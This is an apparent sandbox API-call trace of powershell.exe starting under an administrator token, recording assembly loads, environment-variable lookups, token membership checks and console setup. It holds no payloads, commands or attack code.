	[0311.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0311.362] CoTaskMemAlloc (cb=0x104) returned 0x131da0
	[0311.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x131da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.362] CoTaskMemFree (pv=0x131da0) 
	[0311.897] CoTaskMemAlloc (cb=0x104) returned 0x131da0
	[0311.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x131da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.897] CoTaskMemFree (pv=0x131da0) 
	[0311.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0311.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0316.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0317.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0317.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0318.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0318.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0319.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0319.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0319.622] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0319.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.622] CoTaskMemFree (pv=0xffff0) 
	[0319.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0319.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0320.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0320.576] SetErrorMode (uMode=0x1) returned 0x1
	[0320.576] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d7c0 | out: lpFileInformation=0x26d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0320.576] SetErrorMode (uMode=0x1) returned 0x1
	[0322.437] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0322.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.437] CoTaskMemFree (pv=0xffff0) 
	[0322.439] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0322.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.440] CoTaskMemFree (pv=0xffff0) 
	[0322.440] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0322.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.440] CoTaskMemFree (pv=0xffff0) 
	[0322.442] CoCreateGuid (in: pguid=0x26db88 | out: pguid=0x26db88*(Data1=0xc56c7ddb, Data2=0xeed6, Data3=0x4e2b, Data4=([0]=0x9a, [1]=0x7e, [2]=0xf7, [3]=0x8, [4]=0x83, [5]=0xfd, [6]=0x97, [7]=0x24))) returned 0x0
	[0322.445] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0322.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.446] CoTaskMemFree (pv=0xffff0) 
	[0322.448] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0322.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.448] CoTaskMemFree (pv=0xffff0) 
	[0322.451] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0322.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.451] CoTaskMemFree (pv=0xffff0) 
	[0322.457] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0322.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26d830 | out: lpConsoleScreenBufferInfo=0x26d830) returned 1
	[0322.852] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0322.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26d830 | out: lpConsoleScreenBufferInfo=0x26d830) returned 1
	[0322.853] GetVersionExW (in: lpVersionInformation=0x26d7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0322.856] GetCurrentProcess () returned 0xffffffffffffffff
	[0322.856] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26d858 | out: TokenHandle=0x26d858*=0x318) returned 1
	[0322.861] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d778 | out: TokenInformation=0x0, ReturnLength=0x26d778) returned 0
	[0322.862] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xd7290
	[0322.862] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0xd7290, TokenInformationLength=0x4, ReturnLength=0x26d778 | out: TokenInformation=0xd7290, ReturnLength=0x26d778) returned 1
	[0322.863] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26d8d8 | out: phNewToken=0x26d8d8*=0x314) returned 1
	[0322.863] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d778 | out: TokenInformation=0x0, ReturnLength=0x26d778) returned 0
	[0322.864] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xd72c0
	[0322.864] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0xd72c0, TokenInformationLength=0x4, ReturnLength=0x26d778 | out: TokenInformation=0xd72c0, ReturnLength=0x26d778) returned 1
	[0322.865] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2e19170*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26d8e8 | out: IsMember=0x26d8e8) returned 1
	[0322.865] CloseHandle (hObject=0x314) returned 1
	[0322.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0322.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.244] CoTaskMemAlloc (cb=0x804) returned 0x1b8f8880
	[0323.244] GetConsoleTitleW (in: lpConsoleTitle=0x1b8f8880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0323.244] CoTaskMemFree (pv=0x1b8f8880) 
	[0323.606] CoTaskMemAlloc (cb=0x804) returned 0x1b8f9130
	[0323.606] GetConsoleTitleW (in: lpConsoleTitle=0x1b8f9130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0323.606] CoTaskMemFree (pv=0x1b8f9130) 
	[0323.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0323.609] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0324.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0324.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0325.531] CoCreateGuid (in: pguid=0x26d9d0 | out: pguid=0x26d9d0*(Data1=0xefb66d93, Data2=0x6d88, Data3=0x4763, Data4=([0]=0xb9, [1]=0x19, [2]=0x35, [3]=0xd4, [4]=0x72, [5]=0x9a, [6]=0x42, [7]=0x90))) returned 0x0
	[0325.531] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.531] CoTaskMemFree (pv=0xffff0) 
	[0325.534] WinSqmIsOptedIn () returned 0x0
	[0325.535] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.535] CoTaskMemFree (pv=0xffff0) 
	[0325.536] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.536] CoTaskMemFree (pv=0xffff0) 
	[0325.537] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.537] CoTaskMemFree (pv=0xffff0) 
	[0325.537] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.538] CoTaskMemFree (pv=0xffff0) 
	[0325.538] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.538] CoTaskMemFree (pv=0xffff0) 
	[0325.539] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.539] CoTaskMemFree (pv=0xffff0) 
	[0325.540] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.540] CoTaskMemFree (pv=0xffff0) 
	[0325.540] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.540] CoTaskMemFree (pv=0xffff0) 
	[0325.543] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0325.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.544] CoTaskMemFree (pv=0xffff0) 
	[0326.498] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0326.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.498] CoTaskMemFree (pv=0xffff0) 
	[0326.499] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0326.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.500] CoTaskMemFree (pv=0xffff0) 
	[0326.500] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0326.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.500] CoTaskMemFree (pv=0xffff0) 
	[0327.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
